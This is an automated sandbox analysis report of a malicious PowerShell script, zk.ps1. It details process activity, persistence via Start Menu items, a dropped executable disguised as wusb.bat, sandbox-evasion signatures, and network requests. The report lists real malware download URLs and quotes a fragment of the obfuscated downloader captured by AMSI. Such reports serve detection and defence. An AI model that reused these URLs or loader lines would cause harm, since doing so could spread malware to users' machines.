Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zk.ps1

Overview

General Information

Sample Name:zk.ps1
Analysis ID:879708
MD5:e6bf6857327f35fa2de93d4a51f97a94
SHA1:cf9e0527dd421c74f841d57b73611e0b2cd1d147
SHA256:5921fbf975020277efb4018858252ba81765a3bbeedf1b67061691faf6f4f6da
Tags:ps1www-dld-ae
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Powershell drops PE file
Opens the same file many times (likely Sandbox evasion)
Drops PE files to the user root directory
Powershell creates an autostart link
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Drops PE files to the user directory
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5768 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\zk.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wusb.bat (PID: 6848 cmdline: "C:\Users\Public\wusb.bat" MD5: 9DCA43CB15D97693D2DE73683804C5C7)
    • AcroRd32.exe (PID: 4728 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)
      • RdrCEF.exe (PID: 6940 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.5:49717 version: TLS 1.0
Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdbLm source: wusb.bat, 00000002.00000003.428592709.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr
Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdb source: wusb.bat, 00000002.00000003.428592709.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr
Source: C:\Users\Public\wusb.batCode function: 2_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040595A
Source: C:\Users\Public\wusb.batCode function: 2_2_0040658F FindFirstFileW,FindClose,2_2_0040658F
Source: C:\Users\Public\wusb.batCode function: 2_2_00402862 FindFirstFileW,2_2_00402862
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global trafficHTTP traffic detected: GET /zp/zpeu.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.5:49717 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: powershell.exe, 00000000.00000002.510346545.000001CDDA41E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wusb.bat, 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, wusb.bat, 00000002.00000000.418227016.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, wusb.bat.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.506986091.000001CDD25B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.506986091.000001CDD246D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.447373146.000001CDC2401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.447373146.000001CDC3518000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.447373146.000001CDC3529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
Source: powershell.exe, 00000000.00000002.447373146.000001CDC3518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
Source: powershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmp, zk.ps1String found in binary or memory: http://www.blumo4maxxlasmo4r.com/rh/List%20of%20rmo4quirmo4d%20itmo4ms%20and%20smo4rvicmo4s.pdf
Source: wusb.bat, 00000002.00000003.429172905.00000000027D4000.00000004.00000020.00020000.00000000.sdmp, bn.txt.2.drString found in binary or memory: http://www.oruddho.com
Source: powershell.exe, 00000000.00000002.506986091.000001CDD246D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.506986091.000001CDD246D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.506986091.000001CDD246D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.447373146.000001CDC3EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.506986091.000001CDD25B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.506986091.000001CDD246D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.447373146.000001CDC2E07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dld.ae
Source: powershell.exe, 00000000.00000002.447373146.000001CDC2E07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dld.ae/zp/zpeu.exe
Source: unknownDNS traffic detected: queries for: www.dld.ae
Source: global trafficHTTP traffic detected: GET /zp/zpeu.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
Source: wusb.bat, 00000002.00000002.675816523.00000000006AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\Public\wusb.batCode function: 2_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_004053EF

System Summary

barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\wusb.batJump to dropped file
Source: C:\Users\Public\wusb.batCode function: 2_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040333D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9A5901CD80_2_00007FF9A5901CD8
Source: C:\Users\Public\wusb.batCode function: 2_2_004069562_2_00406956
Source: C:\Users\Public\wusb.batCode function: 2_2_00404C2C2_2_00404C2C
Source: C:\Users\Public\wusb.batProcess Stats: CPU usage > 98%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\zk.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\wusb.bat "C:\Users\Public\wusb.bat"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\wusb.bat "C:\Users\Public\wusb.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdfJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\Public\wusb.batKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Users\Public\wusb.batCode function: 2_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040333D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\wusb.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohunyas2.sup.ps1Jump to behavior
Source: classification engineClassification label: mal56.evad.winPS1@13/63@3/3
Source: C:\Users\Public\wusb.batCode function: 2_2_004020FE CoCreateInstance,2_2_004020FE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\Public\wusb.batCode function: 2_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_004046B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdbLm source: wusb.bat, 00000002.00000003.428592709.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr
Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdb source: wusb.bat, 00000002.00000003.428592709.00000000027D9000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.2.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9A5904FF7 push esp; retf 0_2_00007FF9A5904FF8
Source: C:\Users\Public\wusb.batCode function: 2_2_10002DE0 push eax; ret 2_2_10002E0E
Source: C:\Users\Public\wusb.batCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_10001B18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\wusb.batJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\wusb.batJump to dropped file
Source: C:\Users\Public\wusb.batFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dllJump to dropped file
Source: C:\Users\Public\wusb.batFile created: C:\Users\user\AppData\Local\Temp\nsr743A.tmp\System.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\wusb.batJump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\wusb.batJump to dropped file
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of required items and services.pdf') -oulv 'http://www.blumo4maxxlasmo4r.com/rh/List%20of%20rmo4quirmo4d%20itmo4ms%20and%20smo4rvicmo4s.pdf';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powers
Source: C:\Users\Public\wusb.batFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\LangustJump to behavior
Source: C:\Users\Public\wusb.batFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\GradeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
